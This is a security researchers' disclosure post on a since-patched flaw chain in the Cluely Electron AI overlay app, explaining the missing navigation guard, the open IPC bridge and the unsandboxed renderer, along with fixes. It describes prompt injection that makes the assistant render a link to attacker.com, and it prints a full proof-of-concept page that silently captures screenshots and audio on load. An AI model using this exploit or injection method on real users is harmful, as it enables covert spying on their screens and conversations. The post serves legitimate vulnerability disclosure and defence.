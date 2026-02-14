Note We found this vulnerability back in July 2025 and were lazy to publish at the time. We’re sharing it now, months later, purely as an educational resource for developers building Electron-based AI agents. Everything in this post is based on our analysis of Cluely as it existed back then. We have not been following Cluely’s development since, and for all we know they may have significantly improved their security posture and practices.

In continuation of our series on hacking AI agents, we are back again, this time looking at Cluely, the AI-powered assistant that watches your screen, listens to your mic, and helps you ace interviews, meetings, and more.

AI agents are everywhere now, writing code, watching your screen, listening to your mic. That deep access is by design, and it makes them a juicy target.

Today we’re walking through a vulnerability we found in Cluely back in mid-2025, and showing what can go wrong when Electron apps with deep system access don’t get the security basics right. We have a long history with Electron security. A few years back we published research at DEF CON 30 that let us pwn almost every major Electron app at the time, including Discord.

What Cluely does

Cluely is an Electron-based desktop app that acts as an AI overlay on your screen. It captures your screen and microphone audio to provide real-time AI assistance during interviews, meetings, and more. The app is designed to be undetectable. It hides from screen sharing, Mission Control, and taskbar visibility.

Under the hood it’s a standard Electron app with a React frontend, using react-markdown to render AI responses and @deepgram/sdk for real-time transcription.

The attack surface

Cluely has access to your screen and microphone by design. If an attacker can execute code within the Electron renderer process, they inherit all of those capabilities. The chain has three steps.

1. No navigation guard on the main window

Cluely uses react-markdown to render the AI’s responses. There’s no obvious XSS. The markdown renderer sanitizes output properly, but links still render as clickable <a> tags.

Electron apps are supposed to handle navigation events with a will-navigate handler to prevent the renderer from navigating to arbitrary URLs. Looking at the Cluely source, we can see that the DisplayOverlay class does have this protection:

// DisplayOverlay class - has will-navigate protection this . window . webContents .on ( 'will-navigate' , (a) => { a .preventDefault () }) this . window . webContents .setWindowOpenHandler (() => ({ action : 'deny' }))

But the main window, the one that actually renders AI responses with clickable links, has no such protection. Looking at the base Window class:

1 class de { 2 constructor (e , n) { 3 this .window = new BrowserWindow ( 4 e || { 5 // ... window options ... 6 webPreferences : { 7 preload : join ( P , '../preload/index.cjs' ) , 8 } , 9 } , 10 ) 11 12 // setWindowOpenHandler is set - new windows are denied and opened externally 13 this . window . webContents .setWindowOpenHandler ((o) => { 14 try { 15 const s = new URL ( o .url) 16 ;( s .protocol === 'https:' || (m && s .protocol === 'http:' )) && 17 shell .openExternal ( o .url) 18 } catch (s) { 19 console .error ( `error trying to open url ${ o .url } ` , s) 20 } 21 return { action : 'deny' } 22 }) 23 24 // But NO will-navigate handler! 25 // Clicking a link in the rendered markdown navigates the ENTIRE app 26 } 27 }

So when a user clicks any link rendered in the AI’s markdown response, instead of opening it in the system browser, it navigates the entire Electron app to that URL. The malicious page now loads directly inside Cluely’s renderer process.

2. IPC exposed through the preload script

So we went hunting for what we could do from the renderer. Turns out there’s some juicy IPC exposed.

The preload script exposes the Electron IPC interface directly to the renderer:

1 const c = { 2 ipcRenderer : { 3 send (e , ... r) { 4 n . ipcRenderer .send (e , ... r) 5 } , 6 invoke (e , ... r) { 7 return n . ipcRenderer .invoke (e , ... r) 8 } , 9 on (e , r) { 10 n . ipcRenderer .on (e , (t , ... o) => { 11 r ( null , ... o) 12 }) 13 } , 14 } , 15 process : { 16 platform : process .platform , 17 env : { NODE_ENV : process . env . NODE_ENV } , 18 } , 19 } 20 contextBridge .exposeInMainWorld ( 'electron' , c)

What we are looking at is a wide-open IPC bridge. There’s no allowlist filtering on channel names. Any page loaded in the renderer can call window.electron.ipcRenderer.send() or window.electron.ipcRenderer.invoke() with any channel name.

Now look at what IPC handlers the main process registers:

1 // Capture a screenshot of the user's entire screen 2 R ( ' capture-screenshot ' , async () => { 3 const { contentType: e , data: n } = await captureScreen () 4 return { contentType : e , data : n } 5 }) 6 7 // Enable native screen/audio recording 8 i ( ' mac-set-native-recorder-enabled ' , (e , { enabled: n , useV2: o }) => { 9 n ? startRecording (t , o ?? false ) : stopRecording () 10 }) 11 12 // Enable microphone monitoring 13 i ( ' mac-set-mic-monitor-enabled ' , (e , { enabled: n }) => { 14 n ? startMicMonitor (t) : stopMicMonitor () 15 })

This means from the malicious page now running inside the renderer, we can silently:

Capture screenshots of the victim’s entire screen Record audio from the native recorder (screen audio) Monitor the microphone, capturing everything the user says

And exfiltrate all of it to our server.

3. Sandbox disabled, so a V8 exploit becomes RCE

Looking at the webPreferences , there’s no sandbox: true :

webPreferences : { preload : join ( P , '../preload/index.cjs' ) // no sandbox: true — the renderer is unsandboxed }

Because the renderer is unsandboxed, a V8 exploit in it leads straight to full remote code execution on the victim’s machine. We’re not going to walk through that exploit chain in this post, but we did exactly this on Discord. You can read the full writeup here: Remote Code Execution on Discord Desktop.

The Discord RCE video shows a full reverse shell popping from inside an Electron app. The same attack would work on Cluely:

Watch the Discord RCE demo on YouTube

So the missing will-navigate handler leads to screen and audio leaks with an easy path and then a full RCE via V8 exploit.

Prompt injection as the entry point

Now to actually exploit this, we need to get a malicious link rendered on the user’s Cluely window while they’re in a meeting. There are many ways to pull this off, indirect prompt injection being one of them. For example, consider a scenario where the user is using Cluely during an interview. The interviewer’s task or question contains a crafted prompt injection that causes the AI to render a link:

[ Click here to view the task requirements ] (https://attacker.com/exploit)

The AI renders this as a clickable link in its markdown response. The user clicks it, thinking it’s part of the task. The link navigates the entire Cluely app to our malicious page, and the exploit fires automatically.

The exploit

Here’s the PoC video:

Watch the Cluely proof of concept on YouTube

Here’s the proof of concept that runs inside Cluely after navigation. On page load it silently takes a screenshot and records 10 seconds of audio:

1 <! DOCTYPE html > 2 < html > 3 < head > 4 < title >Cluely Testing</ title > 49 collapsed lines 5 < style > 6 body { 7 font-family : sans-serif ; 8 padding : 20 px ; 9 background-color : transparent ; 10 color : #333 ; 11 text-align : center ; 12 } 13 h1 { 14 color : red ; 15 font-size : 48 px ; 16 } 17 img #bustedImage { 18 max-width : 100 % ; 19 height : auto ; 20 display : block ; 21 margin : 20 px auto ; 22 } 23 #status { 24 margin-top : 20 px ; 25 font-style : italic ; 26 color : #666 ; 27 } 28 #results { 29 display : flex ; 30 justify-content : space-around ; 31 align-items : flex-start ; 32 margin-top : 20 px ; 33 border : 1 px solid #ccc ; 34 padding : 10 px ; 35 background-color : white ; 36 } 37 .media-column { 38 width : 48 % ; 39 text-align : center ; 40 } 41 .media-column h2 { 42 font-size : 18 px ; 43 } 44 img , 45 video { 46 max-width : 100 % ; 47 height : auto ; 48 display : block ; 49 margin-top : 10 px ; 50 margin-left : auto ; 51 margin-right : auto ; 52 } 53 </ style > 54 </ head > 55 < body > 56 < h1 >u are busted</ h1 > 57 < img id = "bustedImage" src = "busted.jpg" alt = "Busted!" /> 58 59 < div id = "status" ></ div > 60 < div id = "results" > 61 < div class = "media-column" > 62 < h2 >Screenshot:</ h2 > 63 < div id = "screenshotResult" ></ div > 64 </ div > 65 < div class = "media-column" > 66 < h2 >Recording:</ h2 > 67 < div id = "audioResult" ></ div > 68 </ div > 69 </ div > 70 71 < script > 72 const statusDiv = document .getElementById ( 'status' ) 73 const screenshotResultDiv = document .getElementById ( 'screenshotResult' ) 74 const audioResultDiv = document .getElementById ( 'audioResult' ) 75 76 /** 77 * Converts a base64 string to an ArrayBuffer. 78 */ 79 function base64ToArrayBuffer (base64) { 80 const binaryString = window .atob (base64) 81 const len = binaryString . length 82 const bytes = new Uint8Array (len) 83 for ( let i = 0 ; i < len; i ++ ) { 84 bytes[i] = binaryString .charCodeAt (i) 85 } 86 return bytes .buffer 87 } 88 89 /** 90 * Encodes raw PCM audio data into a WAV file format (as a Blob). 91 */ 38 collapsed lines 92 function encodeWAV (pcmData , sampleRate , numChannels , bitsPerSample) { 93 const dataSize = pcmData .byteLength 94 const blockAlign = (numChannels * bitsPerSample) >> 3 95 const byteRate = sampleRate * blockAlign 96 97 const buffer = new ArrayBuffer ( 44 + dataSize) 98 const view = new DataView (buffer) 99 100 function writeString (view , offset , string) { 101 for ( let i = 0 ; i < string . length ; i ++ ) { 102 view .setUint8 (offset + i , string .charCodeAt (i)) 103 } 104 } 105 106 // RIFF chunk descriptor 107 writeString (view , 0 , 'RIFF' ) 108 view .setUint32 ( 4 , 36 + dataSize , true ) // little-endian 109 writeString (view , 8 , 'WAVE' ) 110 // "fmt " sub-chunk 111 writeString (view , 12 , 'fmt ' ) 112 view .setUint32 ( 16 , 16 , true ) // 16 for PCM 113 view .setUint16 ( 20 , 1 , true ) // 1 for PCM 114 view .setUint16 ( 22 , numChannels , true ) 115 view .setUint32 ( 24 , sampleRate , true ) 116 view .setUint32 ( 28 , byteRate , true ) 117 view .setUint16 ( 32 , blockAlign , true ) 118 view .setUint16 ( 34 , bitsPerSample , true ) 119 // "data" sub-chunk 120 writeString (view , 36 , 'data' ) 121 view .setUint32 ( 40 , dataSize , true ) 122 123 const pcmBytes = new Uint8Array (pcmData) 124 const wavBytes = new Uint8Array (buffer) 125 wavBytes .set (pcmBytes , 44 ) 126 127 return new Blob ([view] , { type : 'audio/wav' }) 128 } 129 130 // Screenshot 131 const takeScreenshot = async () => { 132 try { 133 statusDiv .textContent = 'Taking screenshot...' 134 const { contentType , data } = 135 await window . electron . ipcRenderer .invoke ( ' capture-screenshot ' ) 136 const blob = new Blob ([data] , { type : contentType }) 137 const imageUrl = URL .createObjectURL (blob) 138 const img = document .createElement ( 'img' ) 139 img .src = imageUrl 140 img . onload = () => URL .revokeObjectURL (imageUrl) 141 screenshotResultDiv .appendChild (img) 142 statusDiv .textContent = 'Screenshot taken successfully.' 143 } catch (error) { 144 console .error ( 'Error taking screenshot:' , error) 145 screenshotResultDiv .textContent = 146 'Error taking screenshot: ' + error .message 147 } 148 } 149 150 // Recording 151 const recordAudio = () => { 152 console .log ( '[Debug] recordAudio called' ) 153 let recordedBase64 = '' 154 const recordDuration = 10000 // 10 seconds 155 156 statusDiv .textContent += ` | Recording for ${ recordDuration / 1000 } seconds and sending to server...` 157 158 const handleData = (event , { base64Data }) => { 159 console .log ( 160 `[Debug] Received mac-native-recorder-data chunk of length: ${ base64Data . length } ` , 161 ) 162 recordedBase64 += base64Data 163 } 164 165 console .log ( '[Debug] Setting up listener for mac-native-recorder-data' ) 166 window . electron . ipcRenderer .on ( 'mac-native-recorder-data' , handleData) 167 168 console .log ( '[Debug] Sending mac-set-native-recorder-enabled : true' ) 169 window . electron . ipcRenderer .send ( ' mac-set-native-recorder-enabled ' , { 170 enabled : true , 171 }) 172 173 setTimeout (() => { 174 console .log ( '[Debug] Timeout reached. Disabling recorder.' ) 175 console .log ( '[Debug] Sending mac-set-native-recorder-enabled : false' ) 176 window . electron . ipcRenderer .send ( ' mac-set-native-recorder-enabled ' , { 177 enabled : false , 178 }) 179 180 console .log ( '[Debug] Removing listener for mac-native-recorder-data' ) 181 window . electron . ipcRenderer .removeListener ( 182 'mac-native-recorder-data' , 183 handleData , 184 ) 185 186 statusDiv .textContent = 'Recording finished. Preparing audio...' 187 console .log ( 188 `[Debug] Total recorded base64 length: ${ recordedBase64 . length } ` , 189 ) 190 191 if (recordedBase64) { 192 try { 193 console .log ( 194 '[Debug] recordedBase64 is not empty. Creating audio element.' , 195 ) 196 const pcmData = base64ToArrayBuffer (recordedBase64) 197 const wavBlob = encodeWAV (pcmData , 24000 , 1 , 16 ) 198 const audioUrl = URL .createObjectURL (wavBlob) 199 200 const audio = document .createElement ( 'audio' ) 201 audio .src = audioUrl 202 audio .controls = true 203 audio .autoplay = true 204 205 audioResultDiv .innerHTML = '' 206 audioResultDiv .appendChild (audio) 207 statusDiv .textContent += ' | Audio is ready to play.' 208 209 audio .addEventListener ( 'error' , (e) => { 210 console .error ( '[Debug] Audio playback error:' , e) 211 audioResultDiv .textContent = 212 'Error playing audio. Check console for details.' 213 }) 214 audioResultDiv .scrollIntoView ({ behavior : 'smooth' }) 215 } catch (error) { 216 console .error ( '[Debug] Error processing audio data:' , error) 217 audioResultDiv .textContent = 'Failed to process audio data.' 218 } 219 } else { 220 console .log ( '[Debug] recordedBase64 is empty.' ) 221 audioResultDiv .textContent = 222 'No audio data was received. The recorder might not be supported on your system.' 223 } 224 } , recordDuration) 225 } 226 227 // Automatically take screenshot and record on page load 228 ;( async () => { 229 await takeScreenshot () 230 recordAudio () 231 })() 232 </ script > 233 </ body > 234 </ html >

When this page loads inside Cluely, the window.electron.ipcRenderer bridge is available. The exploit invokes capture-screenshot to grab a screenshot and sends mac-set-native-recorder-enabled to start recording audio. The attacker gets a screenshot of the victim’s desktop and a recording of everything being said, all without any user prompt or permission dialog.

The impact

Any Cluely user was vulnerable. If an attacker could get the AI to render a malicious link (via prompt injection or social engineering), and the user clicked it, the attacker could:

Get full remote code execution. The unsandboxed renderer means a V8 exploit gives the attacker a shell on the victim’s machine, exactly like our Discord RCE. From there they can install backdoors, exfiltrate files, and persist across reboots.

Capture screenshots of the victim’s entire screen, credentials included.

Record audio from the system recorder, including meetings and interviews.

Monitor the microphone silently.

And even without going the V8 exploit route, the exposed IPC bridge already gives you the screen and mic for free.

An app designed to help you cheat undetectably could be turned into actual malware that spies on you or owns your entire machine, just as undetectably.

The root causes

There are three compounding issues:

The main window has no will-navigate handler, so it allows in-app navigation to arbitrary URLs. The fix is one line: intercept the will-navigate event and either block it or open the URL in the system browser. The preload script exposes send , invoke , and on without any channel filtering, so any page loaded in the renderer can call any IPC handler. The preload should use an allowlist of channels that the renderer legitimately needs. The renderer process runs without a sandbox. Combined with the missing will-navigate handler, this is a direct path to full remote code execution via a V8 exploit, the same attack class we used on Discord. This elevates the vulnerability from a data leak to a complete system compromise.

Disclosure

We discovered this in July 2025. At the time, Cluely didn’t have a vulnerability disclosure program. We tried reaching out through multiple channels and eventually made contact. The issue was silently patched, no acknowledgment, no credit.

Credits and acknowledgments aside, who cares. But, for all the AI startups out there: have a vulnerability disclosure program. Let researchers report bugs to you. Treat them with recognition and good faith.

For everyone else: there are a lot of AI startups building agents that have deep access to your machine, your screen, your mic, your files, your clipboard. Maybe don’t install random shit. We previously hacked Windsurf, Perplexity Comet, OpenAI Atlas, and Google’s Antigravity.

So don’t be surprised if you find an email from us in your inbox at some point.

About us

Our team includes top-ranked CTF competitors, DEF CON-published researchers, and bug bounty hunters. We’ve hacked browsers, operating systems, mobile apps, desktop software, and massive web platforms. Hacktron turns that work into AI agents that work alongside our team on offensive security.

If you’re looking to secure your agentic applications, we can help. We’ve hacked Cluely, Cursor, Windsurf, Perplexity Comet, OpenAI Atlas, Google’s Antigravity, and many more, and we work closely with teams to secure agentic systems.

Meet our team at hacktron.ai. Reach out at hello@hacktron.ai or contact us.